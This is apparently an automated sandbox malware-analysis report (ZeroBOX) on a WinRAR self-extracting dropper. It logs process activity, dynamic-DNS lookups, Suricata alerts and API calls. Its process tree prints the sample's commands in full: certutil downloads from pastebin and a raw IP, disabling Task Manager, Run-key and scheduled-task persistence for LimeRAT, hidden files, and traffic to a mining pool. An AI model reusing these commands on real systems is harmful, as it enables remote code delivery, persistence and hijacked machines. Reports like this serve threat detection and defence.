Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 2, 2022, 8:56 a.m.	May 2, 2022, 8:58 a.m.

Size	427.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`d55af7419949eb1630bf0e6b3684166e`
SHA256	`bff7a405dc189f102b598e9fbbc88ce74f6ef1bd9dac4fa7fc93e8841233ca32`
CRC32	`8AEB3958`
ssdeep	`6144:8/fAhvV6B8ErzPZp5wdz753RSkKJUH43YvN6sNmw3zi7qZ1l+/Axoq8L:YfAv6B8azBwdtK2H4IvN6YQq1l+YxEL`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature

IE.exe "C:\Users\test22\AppData\Local\Temp\IE.exe"
2760
- windowsapp.exe "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
  2984
  - cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
    3068
    - certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW C:\Users\test22\AppData\Local\Temp\version.bat
      2156
    - certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/h6SvjTQp C:\Users\test22\AppData\Local\Temp\hosting.bat
      2276
    - certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/DVn2TV4Q C:\Users\test22\AppData\Local\Temp\versioncd.bat
      196
    - cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
      2608
    - cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
      2740
    - cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
      2976
    - WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
      2896
    - WMIC.exe wmic process where name='taskmgr.exe' delete
      1664
    - WMIC.exe wmic process where name='Taskmgr.exe' delete
      2264
    - WMIC.exe wmic process where name='xmrig.exe' delete
      2296
    - reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2456
    - reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
      204
    - reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
      1756
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
      2568
      - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
        192
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
      2860
      - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
        2840
    - winlogins.exe "C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe"
      2964
      - schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
        2828
      - winlogins.exe "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe"
        2256
    - xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
      3056
    - attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\*.*"
      1660
    - attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
      2104
    - attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\*.*"
      2416
    - attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
      792
    - attrib.exe attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
      2212
    - xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
      2604
    - attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
      2916
    - WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
      2352
    - attrib.exe attrib -s -h "C:\Windows (x86)\*.*"
      2632
    - certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/win.com" C:\Users\test22\AppData\Local\Temp\updateW\win.com
      2940
    - certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/64a1.com" C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
      3232
    - 64a1.com "C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
      3576
      - xagal.exe "C:\Windows (x86)\xagal.exe"
        3896
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
        4008
        
        certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
        176
        
        cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
        3244
        
        cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        2320
        
        WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        3532
        
        cmd.exe C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
        3504
        
        WMIC.exe wmic csproduct get UUID /format:list
        3636
        
        find.exe find "="
        3844
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\run.vbs"
        3892
        
        cmd.exe cmd /c ""C:\Windows (x86)\xcls.bat" "
        2644
        
        WMIC.exe wmic process where name='xagal.exe' delete
        2328
        
        explorer.exe "C:\Windows (x86)\explorer.exe"
        3836
        
        cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
        1968
    - win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
      3648
    - PING.EXE ping 127.0.0.1 -n 5
      3848
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs"
      296
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat" "
        3208
        
        WMIC.exe wmic process where name='windowsapp.exe' delete
        2072

Name	Response	Post-Analysis Lookup
muslada2251.viewdns.net
marena9201.ddns.net
niogem1171.bounceme.net	A 0.0.0.0	0.0.0.0
muslada2251.myvnc.com
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.68.143
muslada2251.hopto.org
muslada2251.serveminecraft.net
niogem1171.serveftp.com
niogem1171.servecounterstrike.com
niogem1171.hopto.org	A 0.0.0.0	0.0.0.0
muslada2251.serveftp.com
muslada2251.servecounterstrike.com
muslada2251.3utilities.com	A 3.1.85.243	3.1.85.243
niogem1171.ddns.net
niogem1171.servequake.com
niogem1171.sytes.net
muslada2251.servehalflife.com
muslada2251.gotdns.ch
muslada2251.servequake.com
marena9201.bounceme.net
marena9201.3utilities.com
niogem1171.freedynamicdns.net	A 0.0.0.0	0.0.0.0
marena9201.freedynamicdns.net
rinot972.ddnsking.com	A 41.103.107.68	41.103.107.68
niogem1171.serveminecraft.net
muslada2251.servebeer.com
niogem1171.onthewifi.com
niogem1171.viewdns.net
rinot972.ddns.net
muslada2251.serveirc.com
muslada2251.servemp3.com
marena9201.freedynamicdns.org
niogem1171.zapto.org	A 0.0.0.0	0.0.0.0
muslada2251.bounceme.net
muslada2251.servehttp.com
niogem1171.servehalflife.com
niogem1171.myftp.org	A 0.0.0.0	0.0.0.0
niogem1171.servegame.com
muslada2251.servepics.com
muslada2251.myftp.org
niogem1171.serveblog.net	A 0.0.0.0	0.0.0.0
niogem1171.freedynamicdns.org	A 3.1.85.243	3.1.85.243
muslada2251.ddnsking.com	A 0.0.0.0	0.0.0.0
niogem1171.webhop.me	A 0.0.0.0	0.0.0.0
niogem1171.gotdns.ch	A 0.0.0.0	0.0.0.0
niogem1171.ddnsking.com	A 0.0.0.0	0.0.0.0
muslada2251.redirectme.net
muslada2251.webhop.me
marena9201.gotdns.ch
niogem1171.3utilities.com	A 0.0.0.0	0.0.0.0
muslada2251.myftp.biz
niogem1171.servebeer.com
niogem1171.myftp.biz	A 0.0.0.0	0.0.0.0
niogem1171.servemp3.com
muslada2251.ddns.net
niogem1171.myvnc.com	A 0.0.0.0	0.0.0.0
marena9201.ddnsking.com
muslada2251.zapto.org
niogem1171.servehttp.com
muslada2251.freedynamicdns.org
muslada2251.sytes.net
muslada2251.freedynamicdns.net
niogem1171.servepics.com
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	131.153.76.130
muslada2251.servegame.com
niogem1171.serveirc.com
niogem1171.redirectme.net
muslada2251.serveblog.net
muslada2251.onthewifi.com

IP Address	Status	Action
104.20.67.143	Active	Moloch
131.153.76.130	Active	Moloch
164.124.101.2	Active	Moloch
3.1.85.243	Active	Moloch
41.103.107.68	Active	Moloch
54.254.238.33	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49175 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 54.254.238.33:80 -> 192.168.56.101:49217	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49217	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49223	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49223	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:62062 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49221	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49221	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:53258 -> 164.124.101.2:53	2028677	ET POLICY DNS Query to DynDNS Domain *.3utilities .com	Potentially Bad Traffic
UDP 192.168.56.101:61798 -> 164.124.101.2:53	2028677	ET POLICY DNS Query to DynDNS Domain *.3utilities .com	Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:60131 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
UDP 192.168.56.101:57609 -> 164.124.101.2:53	2028676	ET POLICY DNS Query to DynDNS Domain *.ddnsking .com	Potentially Bad Traffic
UDP 192.168.56.101:61681 -> 164.124.101.2:53	2028676	ET POLICY DNS Query to DynDNS Domain *.ddnsking .com	Potentially Bad Traffic
UDP 192.168.56.101:59417 -> 164.124.101.2:53	2028678	ET POLICY DNS Query to DynDNS Domain *.bounceme .net	Potentially Bad Traffic
UDP 192.168.56.101:49349 -> 164.124.101.2:53	2028680	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org	Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54813 -> 164.124.101.2:53	2028680	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org	Potentially Bad Traffic
UDP 192.168.56.101:63998 -> 164.124.101.2:53	2028684	ET POLICY DNS Query to DynDNS Domain *.myftp .org	Potentially Bad Traffic
UDP 192.168.56.101:57509 -> 164.124.101.2:53	2028686	ET POLICY DNS Query to DynDNS Domain *.onthewifi .com	Potentially Bad Traffic
UDP 192.168.56.101:63692 -> 164.124.101.2:53	2028692	ET POLICY DNS Query to DynDNS Domain *.servegame .com	Potentially Bad Traffic
UDP 192.168.56.101:53804 -> 164.124.101.2:53	2028701	ET POLICY DNS Query to DynDNS Domain *.viewdns .net	Potentially Bad Traffic
UDP 192.168.56.101:63083 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
UDP 192.168.56.101:56225 -> 164.124.101.2:53	2028677	ET POLICY DNS Query to DynDNS Domain *.3utilities .com	Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 104.20.67.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:61444 -> 164.124.101.2:53	2028691	ET POLICY DNS Query to DynDNS Domain *.serveftp .com	Potentially Bad Traffic
UDP 192.168.56.101:61055 -> 164.124.101.2:53	2028694	ET POLICY DNS Query to DynDNS Domain *.servehttp .com	Potentially Bad Traffic
UDP 192.168.56.101:49911 -> 164.124.101.2:53	2028693	ET POLICY DNS Query to DynDNS Domain *.servehalflife .com	Potentially Bad Traffic
UDP 192.168.56.101:62380 -> 164.124.101.2:53	2028696	ET POLICY DNS Query to DynDNS Domain *.serveminecraft .net	Potentially Bad Traffic
UDP 192.168.56.101:55247 -> 164.124.101.2:53	2028703	ET POLICY DNS Query to DynDNS Domain *.zapto .org	Potentially Bad Traffic
UDP 192.168.56.101:54130 -> 164.124.101.2:53	2028678	ET POLICY DNS Query to DynDNS Domain *.bounceme .net	Potentially Bad Traffic
UDP 192.168.56.101:62594 -> 164.124.101.2:53	2028679	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net	Potentially Bad Traffic
UDP 192.168.56.101:51074 -> 164.124.101.2:53	2028686	ET POLICY DNS Query to DynDNS Domain *.onthewifi .com	Potentially Bad Traffic
UDP 192.168.56.101:51507 -> 164.124.101.2:53	2028687	ET POLICY DNS Query to DynDNS Domain *.redirectme .net	Potentially Bad Traffic
UDP 192.168.56.101:59985 -> 164.124.101.2:53	2028689	ET POLICY DNS Query to DynDNS Domain *.serveblog .net	Potentially Bad Traffic
UDP 192.168.56.101:60905 -> 164.124.101.2:53	2028690	ET POLICY DNS Query to DynDNS Domain *.servecounterstrike .com	Potentially Bad Traffic
UDP 192.168.56.101:63012 -> 164.124.101.2:53	2028694	ET POLICY DNS Query to DynDNS Domain *.servehttp .com	Potentially Bad Traffic
UDP 192.168.56.101:58490 -> 164.124.101.2:53	2028697	ET POLICY DNS Query to DynDNS Domain *.servemp3 .com	Potentially Bad Traffic
UDP 192.168.56.101:61124 -> 164.124.101.2:53	2028698	ET POLICY DNS Query to DynDNS Domain *.servepics .com	Potentially Bad Traffic
UDP 192.168.56.101:50130 -> 164.124.101.2:53	2028703	ET POLICY DNS Query to DynDNS Domain *.zapto .org	Potentially Bad Traffic
UDP 192.168.56.101:62255 -> 164.124.101.2:53	2028678	ET POLICY DNS Query to DynDNS Domain *.bounceme .net	Potentially Bad Traffic
UDP 192.168.56.101:53608 -> 164.124.101.2:53	2028681	ET POLICY DNS Query to DynDNS Domain *.hopto .org	Potentially Bad Traffic
UDP 192.168.56.101:56401 -> 164.124.101.2:53	2013823	ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain	Potentially Bad Traffic
UDP 192.168.56.101:56401 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:50849 -> 164.124.101.2:53	2013823	ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain	Potentially Bad Traffic
UDP 192.168.56.101:50849 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.101:58290 -> 164.124.101.2:53	2028691	ET POLICY DNS Query to DynDNS Domain *.serveftp .com	Potentially Bad Traffic
UDP 192.168.56.101:56988 -> 164.124.101.2:53	2028693	ET POLICY DNS Query to DynDNS Domain *.servehalflife .com	Potentially Bad Traffic
UDP 192.168.56.101:58861 -> 164.124.101.2:53	2028695	ET POLICY DNS Query to DynDNS Domain *.serveirc .com	Potentially Bad Traffic
UDP 192.168.56.101:52610 -> 164.124.101.2:53	2028696	ET POLICY DNS Query to DynDNS Domain *.serveminecraft .net	Potentially Bad Traffic
UDP 192.168.56.101:50858 -> 164.124.101.2:53	2028697	ET POLICY DNS Query to DynDNS Domain *.servemp3 .com	Potentially Bad Traffic
UDP 192.168.56.101:57479 -> 164.124.101.2:53	2028676	ET POLICY DNS Query to DynDNS Domain *.ddnsking .com	Potentially Bad Traffic
UDP 192.168.56.101:58402 -> 164.124.101.2:53	2028679	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net	Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49229	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49229	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:62986 -> 164.124.101.2:53	2028684	ET POLICY DNS Query to DynDNS Domain *.myftp .org	Potentially Bad Traffic
UDP 192.168.56.101:51547 -> 164.124.101.2:53	2028685	ET POLICY DNS Query to DynDNS Domain *.myvnc .com	Potentially Bad Traffic
UDP 192.168.56.101:60516 -> 164.124.101.2:53	2028685	ET POLICY DNS Query to DynDNS Domain *.myvnc .com	Potentially Bad Traffic
UDP 192.168.56.101:56371 -> 164.124.101.2:53	2028687	ET POLICY DNS Query to DynDNS Domain *.redirectme .net	Potentially Bad Traffic
UDP 192.168.56.101:49954 -> 164.124.101.2:53	2028688	ET POLICY DNS Query to DynDNS Domain *.servebeer .com	Potentially Bad Traffic
UDP 192.168.56.101:57333 -> 164.124.101.2:53	2028688	ET POLICY DNS Query to DynDNS Domain *.servebeer .com	Potentially Bad Traffic
UDP 192.168.56.101:52905 -> 164.124.101.2:53	2028689	ET POLICY DNS Query to DynDNS Domain *.serveblog .net	Potentially Bad Traffic
UDP 192.168.56.101:57596 -> 164.124.101.2:53	2028690	ET POLICY DNS Query to DynDNS Domain *.servecounterstrike .com	Potentially Bad Traffic
UDP 192.168.56.101:57451 -> 164.124.101.2:53	2028699	ET POLICY DNS Query to DynDNS Domain *.servequake .com	Potentially Bad Traffic
UDP 192.168.56.101:58519 -> 164.124.101.2:53	2028698	ET POLICY DNS Query to DynDNS Domain *.servepics .com	Potentially Bad Traffic
UDP 192.168.56.101:51869 -> 164.124.101.2:53	2028702	ET POLICY DNS Query to DynDNS Domain *.webhop .me	Potentially Bad Traffic
UDP 192.168.56.101:54098 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
UDP 192.168.56.101:56990 -> 164.124.101.2:53	2028681	ET POLICY DNS Query to DynDNS Domain *.hopto .org	Potentially Bad Traffic
UDP 192.168.56.101:59610 -> 164.124.101.2:53	2028692	ET POLICY DNS Query to DynDNS Domain *.servegame .com	Potentially Bad Traffic
UDP 192.168.56.101:57456 -> 164.124.101.2:53	2028695	ET POLICY DNS Query to DynDNS Domain *.serveirc .com	Potentially Bad Traffic
UDP 192.168.56.101:65266 -> 164.124.101.2:53	2028699	ET POLICY DNS Query to DynDNS Domain *.servequake .com	Potentially Bad Traffic
UDP 192.168.56.101:52806 -> 164.124.101.2:53	2028701	ET POLICY DNS Query to DynDNS Domain *.viewdns .net	Potentially Bad Traffic
UDP 192.168.56.101:51610 -> 164.124.101.2:53	2028702	ET POLICY DNS Query to DynDNS Domain *.webhop .me	Potentially Bad Traffic
UDP 192.168.56.101:55835 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
UDP 192.168.56.101:63120 -> 164.124.101.2:53	2028676	ET POLICY DNS Query to DynDNS Domain *.ddnsking .com	Potentially Bad Traffic
UDP 192.168.56.101:58791 -> 164.124.101.2:53	2028679	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net	Potentially Bad Traffic
UDP 192.168.56.101:63457 -> 164.124.101.2:53	2028680	ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49167 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49174 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49175 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49168 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49170 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49172 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49224 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49239 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1 192.168.56.101:49244 104.20.67.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLS 1.3 192.168.56.101:49274 131.153.76.130:80	None	None	None

Queries for the computername (50 out of 380 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 2, 2022, 8:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2022, 8:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (21 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 2, 2022, 8:56 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:56 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:56 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:56 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:56 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
